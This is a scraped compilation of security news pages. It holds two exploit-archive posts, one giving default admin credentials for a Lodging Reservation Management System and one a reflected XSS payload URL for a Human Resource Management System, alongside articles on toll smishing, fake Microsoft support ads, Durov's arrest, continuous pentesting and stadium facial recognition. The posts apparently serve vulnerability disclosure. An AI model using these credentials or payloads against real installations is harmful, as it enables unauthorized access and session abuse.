Lodging Reservation Management System version 1.0 suffers from an ignored default credential vulnerability.

**Lodging Reservation Management System 1.0 Insecure Settings**

Posted Aug 27, 2024

Authored by indoushka

Lodging Reservation Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | feab3739cbf1410f9c44a493d074c6e6d9f127d93f1158c441c2ea24f02fe97f

Download | Favorite | View

**Lodging Reservation Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : LRMS v1.0 Insecure Settings Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,561)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,878)
*   CGI (1,034)
*   Code Execution (7,838)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,122)
*   Encryption (2,389)
*   Exploit (53,299)
*   File Inclusion (4,265)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,242)
*   Local (14,808)
*   Magazine (587)
*   Overflow (13,178)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,647)
*   Remote (31,701)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,629)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,021)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,913)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,631)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,781)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Lodging Reservation Management System 1.0 Insecure Settings

Scammers are increasingly using toll fees as a lure in smishing attacks with the aim of grabbing victims' personal details and credit card information.

In April 2024, the FBI warned about a new type of smishing scam.

Smishing is the term we use for phishing attacks sent via text message. This particular smishing scam tries to trick users into clicking a link by telling them they owe a “small amount” in toll fees.

The scammers send a text claiming that the recipient owes money for unpaid tolls.

Redacted example of toll smishing text

> “PA Turnpike Toll Services: We’ve noticed an outstanding toll amount of $12.51 on your record. To avoid a late fee of $50.00 visit \[URL to fake site\] to settle your balance.”

It looks as if the targets are chosen randomly, but if you’ve been on a recent summer trip or will be visiting your relatives during the holiday season the chances are higher that you will believe this type of text. Nobody is going to fool you into paying (extra) for your daily commute, right?

Because of the relatively low amount, people may decide to settle the payment before the amount rises.

One of the URLs we tracked for this campaign was myturnpiketollservices\[.\]com which was active from early April until late May. Some others have only been active for a few days.

On the fake website, which is a really convincing copy of the original, visitors are asked to fill out their details like phone numbers, email addresses, full name, address, and their credit card details. Scammers will happily abuse any information that you enter for other malicious activities like identity theft and financial fraud.

Tollsinfosny\[.\]com mimicking the legitimate Tollsbymailny.com

These attacks are not just increasing in numbers in the US, smishing scammers are also targeting people in Australia, Canada, and Japan now.

**How to avoid falling for a smishing scam**

*   Check the phone number that the text message comes from. Some of the scams above were easy to dismiss because they came from telephone numbers outside the US.
*   Look for the actual site that handles the alleged toll fees and compare the domain name. Sometimes there is only a small difference, so inspect it carefully.
*   If you decided to pay, an alarm should go off if you don’t receive confirmation. Official toll agencies will send confirmation after collecting payments. If you don’t receive confirmation, it’s time to investigate and maybe freeze your credit card.
*   Never interact with the scammer in any way. Every reaction provides them with information, even if it’s only that the phone number is in use.
*   If you think the toll fee is feasible because you have indeed travelled in that area, check on the official toll service’s website or call their customer service number.
*   The FBI asks that if you receive a suspicious message, contact the FBI Internet Crime Complaint Center at ic3.gov. Be sure to include the phone number from where the text originated, and the website listed within the text.

****Involved domains****

myturnpiketollservices\[.\]com

nytollservices.com

tollsinfosny\[.\]com

tollsinfonyc\[.\]com

bayareafastraktollservices\[.\]com

intollroadacc219\[.\]com

toll-sunpass\[.\]com

tollnyezpassweb\[.\]com

indiana260roadtollac\[.\]com

inweb-tollroadtrust\[.\]com

in-tollroadgouv1\[.\]com

newyorktollroadtrust1\[.\]com

nyserviceezpass\[.\]com

intrust-tollroadweb\[.\]com

sunspass\[.\]com

sunspasstollsservices\[.\]com

sunpasstollservices\[.\]com

tollsbymailsny\[.\]com

**Several of these were hosted at the IP:**

45.8.92\[.\]38

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 SMS scammers use toll fees as a lure 

French authorities detained Durov to question him as part of a probe into a wide range of alleged violations—including money laundering and CSAM—but it remains unclear if he will face charges.

French prosecutors gave preliminary information in a press release on Monday about the investigation into Telegram CEO Pavel Durov, who was arrested suddenly on Saturday at Paris’ Le Bourget airport. Durov has not yet been charged with any crime, but officials said that he is being held as part of an investigation “against person unnamed” and can be held in police custody until Wednesday.

The investigation began on July 8 and involves wide-ranging charges related to alleged money laundering, violations related to import and export of encryption tools, refusal to cooperate with law enforcement, and “complicity” in drug trafficking, possession and distribution of child pornography, and more.

The investigation was initiated by “Section J3” cybercrime prosecutors and has involved collaboration with France’s Centre for the Fight against Cybercrime (C3N) and Anti-Fraud National Office (ONAF), according to the press release. “It is within this procedural framework in which Pavel Durov was questioned by the investigators,” Paris prosecutor Laure Beccuau wrote in the statement.

Telegram did not respond to multiple requests for comment about the investigation but asserted in a statement posted to the company's news channel on Sunday that Durov has “nothing to hide.”

“Given the existence of several preliminary investigations in France concerning Telegram in relation to the protection of minors' rights and in cooperation with other French investigation units—for instance, on cyber harassment—the arrest of Durov, does not seem to me like a highly exceptional move,” says Cannelle Lavite, a French lawyer who specializes in free-speech matters.

Lavite notes that Durov is a French citizen who was arrested in French territory with an arrest warrant issued by French judges. She adds that the list of charges involved in the investigation is “extensive,” a wide net that she says is not entirely surprising in the context of “France's ambiguous legislative arsenal” meant to balance content moderation and free speech.

Durov is a controversial figure for his leadership of Telegram, in large part because he has not typically cooperated with calls to moderate the platform's content. In some ways, this has positioned him as a free-speech defender against government censorship, but it has also made Telegram a haven for hate speech, criminal activity, and abuse. Additionally, the platform is often billed as a secure communication tool, but much of it is open and accessible by default.

“Telegram is not primarily an encrypted messenger; most people use it almost as a social network, and they’re not using any of its features that have end-to-end encryption,” says John Scott-Railton, senior researcher at Citizen Lab. “The implication there is that Telegram has a wide range of abilities and access to potentially do content moderation and respond to lawful requests. This puts Pavel Durov very much in the center of all kinds of potential governmental pressure.”

On top of all of this, many researchers have questioned whether Telegram's end-to-end encryption is durable when users do elect to enable it.

French president Emmanuel Macron said in a social media post on Monday that “France is deeply committed to freedom of expression and communication … The arrest of the president of Telegram on French soil took place as part of an ongoing judicial investigation. It is in no way a political decision.”

News of Durov's arrest is fueling concerns, though, that the move could threaten Telegram's stability and undermine the platform. The case seems poised, too, to have implications in long-standing debates around the world about social media moderation, government influence, and use of privacy-preserving end-to-end encryption.

Lavite says the case certainly invokes debates about “the balance between the right to encrypted communication and free speech on the one hand, and users' protection—content moderation—on the other hand.” But she notes that there is a lot of information about the investigation that is unknown and “a lot of blurry zones still.”

On Monday afternoon, Telegram seemed to be receiving a download boost from the situation, moving from 18th to 8th place in Apple's US App Store apps ranking. Global iOS downloads were up by 4 percent, and in France the app was number one in the App Store social network category and number three overall.

Telegram CEO Pavel Durov’s Arrest Linked to Sweeping Criminal Investigation

We came a cross a clever abuse of Google and Microsoft's services that fooled us for a minute. See if you could have spotted it.

Many people turn to their favorite search engine when they are facing an issue with their computer. One common search query is to look for the telephone number or contact form for Microsoft, Apple or one of many other brands.

Scammers have long been interested in pretending to be Microsoft technical support. Years ago, inbound unsolicited calls were one of the most common techniques to bring in new victims. In more recent times, fake alerts that take over the browser claiming your computer is infected with viruses have been the dominant vector.

Today, we take a look at two subtle and extremely deceiving campaigns that leverage Google ads and Microsoft’s own infrastructure to create perfect scam scenarios that fooled us for a minute.

**Trick #1: Fake Helpdesk page via Microsoft Learn**

We found this ad while looking for Microsoft support live agents. The top (sponsored) result looks like it was bought by Microsoft itself with its official logo and URL.

Users who click on the ad are redirected to a legitimate Microsoft website (_learn.microsoft.com_) showing Microsoft’s “official” phone number. This page has the look and feel of a genuine knowledge base article especially since it appears to be posted by “Microsoft Support”:

Clicking the 3 dots beside the ad reveals that it actually doesn’t belong to Microsoft at all, but instead was paid for by an advertiser from Vietnam. This does not mean this is the actual scammer, simply that this account may have been compromised and is being used to create malicious ads.

As for the Microsoft page, it was created by a scammer via a fake Microsoft Support profile using Microsoft Learn collections.

> _Microsoft Learn Collections is a feature available to anyone with a Microsoft Learn profile. Collections allow you to create curated lists of Microsoft Learn content to share with your followers. A collection can include documentation articles, training modules, learning paths, videos, code samples, and more._

Here’s the profile for “Microsoft Support” that actually belongs to the scammer, using the profile id JamesKing-8561:

**Trick #2: Microsoft Search query hijack**

The second (unrelated) ad campaign we saw is using a different tactic but also starts with a Google ad. When victims clicking on it, it will launch a search query page via _microsoft.com/en-us/search/explore_.

This clever trick works by passing the following parameters to the URL:

Call+%2B1+%28844%29+327-5425++Microsoft+Support+%28USA%29

When the page finishes loading, it will display what looks like a contact number from Microsoft. In a way, this is a form of advertisement that totally abuses what the Microsoft search feature was intended for:

Fraudsters sitting in a far away call center pretending to be Microsoft technicians will trick victims into letting them onto their computers using remote access programs. The damage these scammers can do ranges from stealing a few hundred dollars as part of a “repair”, to emptying entire savings accounts.

Needless to say, you do not want to call these crooks, let alone grant them access to your computer.

**Getting real support**

Scammers are well aware that many people, especially the elderly, aren’t in a position to take their computers to a brick and mortar shop. Looking for help online from the convenience of their home is often the only option.

Here are some tips:

*   Never call a phone number that you see in an ad (search ad, or display ad).
*   To visit an official website, refrain from clicking on sponsored links. Instead, scroll further down and look for the organic search result.
*   Tip above does not take into account SEO poisoning, where scammers game search engines’ results. If you can, type in the website directly into the address bar.
*   Tip above does not take into account ‘typosquatting’ which is when you make a mistake in the spelling of the website and are redirected to a malicious site instead. This is something you should be aware of as well.
*   Perhaps there is help available locally, which you may get by asking a friend or acquaintance.

Finally, keep your computer up-to-date and secure with protection against malware and malicious websites. Malwarebytes‘ offering includes the free Browser Guard extension which secures your online browsing experience.

In the meantime, the real Microsoft website can be accessed at _support.microsoft.com_ and it looks like this (in the U.S.):

 PSA: These &#8216;Microsoft Support&#8217; ploys may just fool you 

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

**Human Resource Management System 2024 1.0 Cross Site Scripting**

Posted Aug 26, 2024

Authored by indoushka

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 25f4d7b7ca25178696d74bb308a9abcdd65caa3fc6c471e46b4b16febaa084ea

Download | Favorite | View

**Human Resource Management System 2024 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 XSS Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload :index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>[+] http://127.0.0.1/hrm/index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,543)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,875)
*   CGI (1,034)
*   Code Execution (7,834)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,116)
*   Encryption (2,389)
*   Exploit (53,289)
*   File Inclusion (4,263)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,239)
*   Local (14,807)
*   Magazine (587)
*   Overflow (13,177)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,646)
*   Remote (31,695)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,625)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,016)
*   Web (9,973)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,109)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,895)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,615)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,780)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Human Resource Management System 2024 1.0 Cross Site Scripting

What is Continuous Attack Surface Penetration Testing or CASPT?
Continuous Penetration Testing or Continuous Attack Surface Penetration Testing (CASPT) is an advanced security practice that involves the continuous, automated, and ongoing penetration testing services of an organization's digital assets to identify and mitigate security vulnerabilities. CASPT is designed for enterprises with an

****What is Continuous Attack Surface Penetration Testing or CASPT?****

Continuous Penetration Testing or Continuous Attack Surface Penetration Testing (CASPT) is an advanced security practice that involves the continuous, automated, and ongoing penetration testing services of an organization's digital assets to identify and mitigate security vulnerabilities. CASPT is designed for enterprises with an evolving attack surface where periodic pentesting is no longer sufficient. Unlike traditional penetration testing, which is often performed annually or semi-annually, CASPT is an ongoing process that integrates directly into the software development lifecycle (SDLC), ensuring that vulnerabilities are discovered and addressed in real-time or near-real-time.

CASPT is a proactive security measure designed to stay ahead of potential attackers by continuously evaluating the security posture of an organization. It enables security teams to identify critical entry points that could be exploited by attackers, validate the effectiveness of existing security controls, and ensure that any newly introduced code or infrastructure changes do not introduce new vulnerabilities. Users can run baseline tests to share changes or new updates across assets and associated vulnerabilities providing a roadmap for pentesting teams as soon as changes are detected.

****What Continuous Attack Surface Penetration Testing is Not****

While CASPT shares similarities with traditional penetration testing, there are distinct differences:

1.  **Not a One-Time Assessment**: Traditional penetration testing is typically a one-time assessment conducted periodically. CASPT, however, is an ongoing process, with tests running continuously or on a frequent, scheduled basis.
2.  **Not Just Automated**: CASPT is not limited to automated tools. While automation plays a significant role, continuous penetration testing also involves human expertise to conduct more sophisticated and context-aware attacks that automated tools might miss.
3.  **Not Isolated**: CASPT is not a standalone practice. It is integrated with other security measures such as Attack Surface Management (ASM) and Red Teaming exercises to provide a holistic view of an organization's security posture.

****How CASPT is Applied Across Different Assets****

Continuous Attack Surface Penetration Testing can be applied across a variety of digital assets, including:

1.  **Web Applications**: Continuous testing of web applications helps in identifying vulnerabilities like SQL injection, cross-site scripting (XSS), and broken authentication mechanisms. Automated tools can scan for known vulnerabilities, while manual testing can uncover complex logic flaws that automated tools might miss.
2.  **APIs**: As APIs become more prevalent, they present an increasing attack surface. API Penetration Testing ensures that they are secure against common threats such as API key leaks, broken object level authorization, and injection attacks.
3.  **Cloud Environments**: Cloud security is critical as more organizations move to cloud-based infrastructure. Continuous penetration testing in the cloud involves checking configurations, access controls, and potential vulnerabilities in cloud services to prevent unauthorized access and data breaches.
4.  **Networks**: Network security is a foundational aspect of any organization's security posture. Continuous penetration testing of networks involves scanning for open ports, misconfigured firewalls, and outdated software that could be exploited by attackers.
5.  **Mobile Applications**: With the proliferation of mobile apps, securing them is crucial. Continuous penetration testing for mobile apps focuses on vulnerabilities specific to mobile environments, such as insecure data storage, improper session handling, and weak encryption.

****Integration with Attack Surface Management and Red Teaming****

Integrating continuous penetration testing with Attack Surface Management (ASM) and red teaming offers a robust, dynamic security approach that enhances an organization's resilience against cyber threats. Here's how CASPT integration works and its benefits:

**1\. Continuous Attack Surface Pentesting**

CASPT involves the ongoing, automated assessment of an organization's systems to identify vulnerabilities. Unlike traditional, periodic pentests, this approach ensures that security assessments are always up to date, helping to discover new vulnerabilities as they emerge.

**2\. Attack Surface Management (ASM)**

ASM involves continuously monitoring and analyzing an organization's digital footprint to identify vulnerable assets and associate vulnerabilities for prioritization for mitigation of potential attack vectors. This prioritization acts as a roadmap for pentesting reducing valuable time and resources. When combined with CASPT, ASM helps organizations maintain an up-to-date understanding of their attack surface, ensuring that continuous penetration tests are focused on the most critical assets.

**3\. Red Teaming**

Red teaming simulates real-world cyberattacks by having a team of ethical hackers attempt to breach the organization's defenses. This provides a deeper understanding of the effectiveness of the security measures in place. When combined with CASPT, red teaming benefits from up-to-date knowledge of vulnerabilities and attack surfaces, making the simulations more accurate and relevant.

****How the Integration Works****

*   **Automation and Scalability**: CASPT tools are often automated, allowing them to scan for vulnerabilities at scale and in real-time. When integrated with ASM, these tools can prioritize scans based on the most critical assets or newly discovered attack surfaces, ensuring that the most significant risks are addressed first.
*   **Real-time Threat Detection**: ASM provides a real-time view of the organization's digital footprint, including any changes or new assets. CASPT can immediately test these new assets for vulnerabilities, reducing the window of opportunity for attackers.
*   **Enhanced Red Teaming**: Red teams can use the data from ASM and continuous pentesting to focus their efforts on the most critical and vulnerable areas. This targeted approach increases the likelihood of uncovering sophisticated attack vectors that may go unnoticed in a standard pentest.
*   **Proactive Security Posture**: By continuously identifying and testing vulnerabilities, organizations shift from a reactive to a proactive security posture. This approach not only helps in finding and fixing vulnerabilities before they are exploited but also in understanding how an attacker might move laterally through the network.

The benefits of integrating CASPT with other offensive security tools like ASM and red teaming are significant including a reduced attack surface, increased resilience to withstand real-world attacks, cost-efficiencies from reduced breaches and operational downtime, and meeting regulatory requirements by providing ongoing evidence of security practices and vulnerabilities management.

****Why Continuous Attack Surface Penetration Testing is Important****

The importance of CASPT is underscored by several key benefits:

****Cost-Effectiveness****

While the initial investment in CASPT may be higher than traditional penetration testing, the long-term cost savings are significant. By continuously identifying and mitigating vulnerabilities, organizations can avoid the costs associated with data breaches, regulatory fines, and reputational damage.

****Increased Visibility****

CASPT provides ongoing visibility into an organization's security posture. This enables security teams to identify and address vulnerabilities as they arise, rather than waiting for the next scheduled penetration test. For those providers who provide automated vulnerability validation and mapping, users will have enhanced visibility with an actual roadmap of all attack paths and routes to identified vulnerabilities remediating exposures before an actual attack can occur.

****Compliance****

Many regulatory frameworks and industry standards now require organizations to conduct regular security assessments. CASPT helps organizations meet these requirements by providing a continuous stream of security testing data that can be used to demonstrate compliance.

****Attack Path Validation and Mapping****

More innovative CASPT providers offer organizations with continuous validation of their attack paths by with an automatic visualization that maps out all potential routes an attacker might take to compromise critical assets from domain, subdomains, IP addresses, and discovered vulnerabilities. This enables security teams to focus their efforts on securing the most vulnerable areas of their environment.

****Why Annual Penetration Testing Isn't Enough Anymore****

We are all aware that the cybersecurity landscape is constantly evolving, with new threats and vulnerabilities emerging daily. Annual penetration testing, while valuable, is no longer sufficient to keep up with the pace of these changes. There are several reasons why annual penetration testing falls short:

1.  **Delayed Identification of Vulnerabilities**: With annual testing, vulnerabilities may remain undiscovered for months, leaving the organization exposed to potential attacks. CASPT, on the other hand, ensures that vulnerabilities are identified and addressed as soon as they are introduced.
2.  **Dynamic Environments:** Modern IT environments are highly dynamic, with frequent changes to code, infrastructure, and configurations. Annual or periodic pentesting does not account for these continuous changes, potentially missing critical vulnerabilities introduced between tests.
3.  **Increased Attack Sophistication**: Attackers are becoming more sophisticated, employing advanced techniques that can bypass traditional defenses. Continuous testing helps organizations stay ahead of these evolving threats by constantly evaluating their security posture.

****Top 10 Use Cases for Continuous Attack Surface Penetration Testing****

Considering CASPT depends on various factors related to the organization's security needs and business objectives, industry requirements, and threat landscape. Here's a deeper dive into various scenarios and when and why an organization might consider adopting CASPT:

****1\. Highly Dynamic Environments****

**Scenario**: Organizations with rapidly changing IT environments, such as those frequently deploying new applications, services, or updates.

**Reason:** In such environments, the attack surface is constantly evolving, and traditional periodic pentesting may miss newly introduced vulnerabilities. CASPT ensures that every change is tested for security weaknesses as soon as it's made, reducing the risk of unpatched vulnerabilities being exploited.

****2\. Regulatory and Compliance Requirements****

**Scenario**: Industries with strict compliance standards, such as finance, healthcare, or critical infrastructure, where maintaining high levels of security is mandatory.

**Reason:** CASPT provides ongoing evidence of vulnerability management and proactive security measures, helping organizations meet compliance requirements like PCI-DSS, HIPAA, or GDPR. This approach demonstrates a commitment to security, which is crucial for audits and regulatory reporting.

****3\. High-Value Targets****

**Scenario:** Organizations that are considered high-value targets for cyberattacks, such as those in finance, healthcare, government, or technology sectors.

**Reason:** High-value targets are more likely to be under constant threat from sophisticated attackers. CASPT helps to uncover vulnerabilities before attackers do, providing a critical layer of defense by constantly assessing and mitigating risks.

****4\. Mature Security Programs****

**Scenario:** Organizations that have already established a robust security program and are looking to move towards a more proactive security approach with offensive security tools.

**Reason:** For organizations with mature security practices, CASPT is a natural evolution. It complements existing security measures, balances existing defensive tools with offensive security tools, and provides ongoing validation of security controls, ensuring they remain effective against emerging threats.

****5\. Cloud-Native or Hybrid Environments****

**Scenario:** Organizations that heavily rely on cloud infrastructure or operate in hybrid or multicloud environments.

**Reason:** Cloud environments are often more fluid and dynamic, with assets being spun up and down frequently. CASPT in these environments ensures that security assessments are as agile as the infrastructure, addressing vulnerabilities in real-time and adapting to the shifting landscape.

****6\. Increased DevSecOps Practices****

**Scenario:** Organizations undergoing digital transformation initiatives, such as moving to microservices architectures, adopting DevOps practices, or integrating IoT devices.

**Reason:** Digital transformation often introduces new technologies and processes that may not have been fully assessed for security risks. CASPT provides a mechanism to ensure that as the organization transforms, security keeps pace with these changes, preventing gaps that could be exploited.

****7\. Merger & Acquisition(M&A) Activities****

**Scenario:** Organizations involved in mergers or acquisitions where networks, software, and people, processes, and technologies merge and overlap.

**Reason**: M&A activities can introduce new systems and networks into an organization, often with little time for traditional security assessments. CASPT ensures that any vulnerabilities in newly acquired assets are quickly identified and addressed, reducing the risk of integrating vulnerable systems.

****8\. Third-Party Risk Management****

**Scenario:** Organizations that rely heavily on third-party vendors or partners where the supply chain is changing, growing, or is fluid with incoming and outgoing vendors.

**Reason**: Third-party vendors can introduce vulnerabilities into an organization's environment especially as confidential and sensitive data is shared and exchanged between organizations. CASPT helps identify and mitigate these risks by regularly assessing third-party systems and integrations, ensuring they do not become an attack vector.

****9\. Alignment with DevSecOps****

**Scenario:** For organizations adopting DevSecOps practices, CASPT integrates seamlessly into the CI/CD pipeline, ensuring that security is embedded into the development process.

**Reason:** This helps in identifying vulnerabilities early in the software development life cycle (SDLC), reducing the cost and effort of fixing them later.

****10\. Enhanced Incident Response****

**Scenario**: Continuous pentesting provides a constant flow of security data, which can be invaluable for incident response teams.

**Reason:** This data helps in understanding the organization's security posture and in identifying potential weaknesses that could be exploited during an attack.

****When Not to Consider Continuous Pentesting****

Smaller organizations with limited security budgets or personnel may find it challenging to implement and manage CASPT. In such cases, using a third-party CASPT provider can help provide the expertise and resources needed. Also combined with periodic pentesting and other security measures may make CASPT more feasible.

In addition, organizations with relatively static IT environments may not require the constant assessment provided by CASPT. Periodic pentests, combined with regular security audits, may be sufficient to maintain security.

CASPT is particularly beneficial for organizations operating in dynamic, high-risk environments, those with stringent compliance requirements, or those looking to adopt a more proactive security posture. It provides real-time visibility into vulnerabilities, enhances risk management, and aligns well with modern security practices like DevSecOps.

****Best Practices for Implementing Continuous Attack Surface Penetration Testing****

Implementing CASPT requires careful planning and execution. Here are some best practices to consider:

1.  **Determine Frequency**: The frequency of CASPT should be based on the organization's risk profile, the criticality of assets, and the frequency of changes to the environment. For example, highly dynamic environments may require daily or weekly testing, while less dynamic environments may only need weekly or bi-monthly testing.
2.  **Set Clear Objectives and Goals:** Before implementing CASPT, organizations should define clear objectives and goals for the testing process. This includes identifying the assets to be tested, the types of vulnerabilities to focus on, and the desired outcomes of the testing.
3.  **Establish Clear Communication Channels:** Effective communication is critical to the success of CASPT. Organizations should establish clear communication channels between security teams, developers, and other stakeholders to ensure that vulnerabilities are addressed promptly.
4.  **Use of Both Manual and Automated Testing Techniques:** While automation is a key component of CASPT, manual testing is equally important. Automated tools can quickly identify known vulnerabilities, while manual testing can uncover more complex issues that require human expertise.

****Conclusion****

Continuous Attack Surface Penetration Testing represents a fundamental shift in how organizations approach security. By adopting a proactive, continuous approach to penetration testing, organizations can stay ahead of emerging threats, improve their security development cycle, and protect their most valuable assets. While the initial investment in CASPT may be higher, the long-term benefits—such as cost savings, increased visibility, and enhanced compliance—make it a critical component of any modern security strategy.

In a world where cyber threats are constantly evolving, annual penetration testing is no longer sufficient. Continuous Attack Surface Penetration Testing offers a more effective, comprehensive, and timely approach to securing an organization's digital assets. By integrating CASPT with other offensive security practices like Attack Surface Management and Red Teaming, organizations can ensure a robust offense against even the most sophisticated attackers.

In summary, Continuous Penetration Attack Surface Testing is not just a security measure—it's a strategic advantage. Organizations that embrace CASPT can expect to achieve greater resilience by taking the fight back to attackers and playing at their own game.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Facts About Continuous Penetration Testing and Why It’s Important

Protesters took to Citi Field Wednesday to raise awareness of the facial recognition systems that have become common at major league sporting venues.

Thousands of people lined up outside Citi Field in Queens, New York, on Wednesday to watch the Mets face off with the Orioles. But outside the ticketing booth, a handful of protesters handed out flyers. They were there to protest a recent Major League Baseball program, one that’s increasingly common in professional sports: using facial recognition on fans.

Facial recognition companies and their customers argue that these systems save time, and therefore money, by shortening lines at stadium entrances. However, skeptics argue that the surveillance tools are never totally secure, make it easier for police to get information about fans, and fuel “mission creep” where surveillance technology becomes more common or even required.

The MLB’s facial recognition program, dubbed Go-Ahead Entry, lets participating fans go on a separate security line, usually shorter than the other queues. Fans download the MLB Ballpark app, submit a selfie, and have their face matched at an in-person camera kiosk at a stadium’s entrance.

Six MLB teams are participating in Go-Ahead Entry, including the Philadelphia Phillies, Cincinnati Reds, Houston Astros, Kansas City Royals, San Francisco Giants, and Washington Nationals.

Some MLB teams, including the Mets, have their own facial recognition programs for express entry. The Mets have been using the facial recognition company Wicket for its Mets Entry Express program since 2021. The Cleveland Guardians, similarly, have been using technology from the company Clear at its ballpark, Progressive Field, since 2019.

Jeff Boehm, Wicket's chief operating officer, tells WIRED in an email that the company believes in “the responsible use of biometric technology to improve the event experience,” which includes taking “data security and privacy very seriously.”

Boehm adds: “As with many new technologies, there is misinformation out there about how the technology is being used. Contrary to some of these claims, Wicket's use is always 100% opt-in (and users can opt-out at any time) and we are not scanning people's faces without their consent. The data is not shared or sold to any third parties.”

Neither the Mets nor MLB immediately responded to WIRED’s requests for comment.

The National Football League has also started using Wicket facial recognition for express entry. NFL spokesperson Brian McCarthy said in an X post that the league-wide program, at least currently, is only available to "team/game-day personnel, vendors, and media”—not fans. The Cleveland Browns and Tennessee Titans, however, do have facial recognition entry systems that fans can use. (The news of the NFL’s expanded use of face recognition still caused confusion on Facebook and X, where some people thought facial recognition would be required at the stadiums for all 32 NFL teams.)

At Citi Field on Wednesday, the Mets Entry Express Line was used scarcely, perhaps five people every five minutes or so. There was never a line. The main security lines, though longer in comparison, took only about five minutes.

A group of privacy advocates stand outside Citi Field on Wednesday to warn fans about the growing use of facial recognition systems at sports events.Photograph: Caroline Haskins

Stadiums Are Embracing Face Recognition. Privacy Advocates Say They Should Stick to Sports

Mobile users in the Czech Republic are the target of a novel phishing campaign that leverages a Progressive Web Application (PWA) in an attempt to steal their banking account credentials.
The attacks have targeted the Czech-based Československá obchodní banka (CSOB), as well as the Hungarian OTP Bank and the Georgian TBC Bank, according to Slovak cybersecurity company ESET.
"The phishing

Mobile Security / Banking Fraud

Mobile users in the Czech Republic are the target of a novel phishing campaign that leverages a Progressive Web Application (PWA) in an attempt to steal their banking account credentials.

